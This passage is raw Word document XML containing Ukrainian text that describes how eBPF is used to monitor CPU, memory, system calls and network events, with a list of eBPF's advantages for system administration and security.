    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="00F163FA" w:rsidP="000B0BB1">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1. </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Моніт</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">оринг продуктивності процесора. </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>eBPF дозволяє відстежувати використання процесора різними процесами та системними викликами. Це допомагає виявляти перевантаження, високі навантаження на конкретні процеси або системні виклики, а також оптимізувати розподіл ресурсів.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Наприклад, можна використовувати BPF для збору статистики про кількість циклів процесора, які споживають певні процеси.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="00F163FA" w:rsidP="000B0BB1">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 xml:space="preserve">2. Моніторинг пам’яті. </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Моніторинг використання пам</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>яті є важ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ливим для виявлення витоків пам’</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>яті</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> або підвищеного споживання пам’</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>яті процесами. За допомогою eBPF можна відстежувати системні виклики для алокації та звільн</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ення пам’</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>яті, що дозволяє оперативно виявити потенційні проблеми.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="00F163FA" w:rsidP="000B0BB1">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3. Моніторинг системних викликів. </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Завдяки eBPF можна відстежувати всі системні виклики, які виконуються в </w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>. Це допомагає виявляти неефективні або підозрілі системні виклики, що можуть впливати на загальну продуктивність системи.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Наприклад, можна створити програму, яка збирає статистику викликів функцій ядра, таких як </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="00F163FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Arial Unicode MS" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>`open()`</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="00F163FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Arial Unicode MS" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>`read()`</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, або </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="00F163FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Arial Unicode MS" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>`write()`</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, і виводить їх кількість чи частоту виконання.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="002D54D8" w:rsidP="000B0BB1">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4. Трасування мережевих подій. </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Відстеження мережевих подій за допомогою eBPF дозволяє моніторити всі мережеві запити та відповіді, що надходять на систему. Це включає моніторинг мережевого трафіку, вкл</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ючаючи сокетні запити, TCP/IP з’</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>єднання та інші.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Наприклад, можна використовувати eBPF для аналізу продуктивності мережі, виявлення перевантажень або виявлення підозрілих мережевих атак.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="002D54D8" w:rsidP="000B0BB1">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5. Аналіз виконання програм. </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Завдяки eBPF можна моніторити виконання конкретних програм, відстежувати час їх роботи, споживання ресурсів, а також взаємодію з іншими процесами або з системними ресурсами. Це може бути корисно для оптимізації продуктивності програм або для виявлення помилок у їх виконанні.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="007F018F" w:rsidP="000B0BB1">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7F018F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="002D54D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Основними п</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ереваг</w:t>
      </w:r>
      <w:r w:rsidR="002D54D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ами eBPF для моніторингу є</w:t>
      </w:r>
      <w:r w:rsidRPr="007F018F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [5]</w:t>
      </w:r>
      <w:r w:rsidR="002D54D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="002D54D8" w:rsidP="000B0BB1">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Реальний час</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>: eBPF дає змогу проводити моніторинг у реальному часі без значних накладних витрат.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="002D54D8" w:rsidP="000B0BB1">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Гнучкість і точність</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>: Завдяки гнучкості в налаштуванні фільтрів та подій, eBPF дозволяє отримувати точні дані про систему без необхідності модифікації її структури.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="002D54D8" w:rsidP="000B0BB1">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 Покращена видимість</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>: Завдяки можливості монітор</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">ити всі аспекти роботи системи </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">від мережевих подій до системних викликів </w:t>
      </w:r>
      <w:r w:rsidR="005B5269">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> eBPF надає глибоке розуміння стану системи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRPr="000B0BB1" w:rsidRDefault="007F018F" w:rsidP="002D54D8">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7F018F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="002D54D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Підсумовуючи, необхідно зазначити, що </w:t>
      </w:r>
      <w:r w:rsidR="002D54D8" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>eBPF стає важливим інструментом дл</w:t>
      </w:r>
      <w:r w:rsidR="002D54D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">я забезпечення безпеки та </w:t>
      </w:r>
      <w:r w:rsidR="002D54D8" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>моніторингу</w:t>
      </w:r>
      <w:r w:rsidR="002D54D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>завдяки своїй здатності виконувати програми в ядрі з мінімальними нак</w:t>
      </w:r>
      <w:r w:rsidR="002D54D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ладними витратами. У системах безпеки</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> eBPF дозволяє створювати потужні фільтри для блокування небажаних системних викликів, мережевих а</w:t>
      </w:r>
      <w:r w:rsidR="002D54D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>так та інших шкідливих дій. У системах моніторингу</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> eBPF дозволяє збирати детальні дані про продуктивність системи, включа</w:t>
      </w:r>
      <w:r w:rsidR="002D54D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ючи використання процесора, пам’</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>яті, системних викликів та мережевих подій. Завдяки своїй гнучкості і швидкості, eBPF є незамінним інструментом для адміністрації та захисту сучасних систем</w:t>
      </w:r>
      <w:r w:rsidRPr="007F018F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [5]</w:t>
      </w:r>
      <w:r w:rsidR="000B0BB1" w:rsidRPr="000B0BB1">
        <w:rPr>
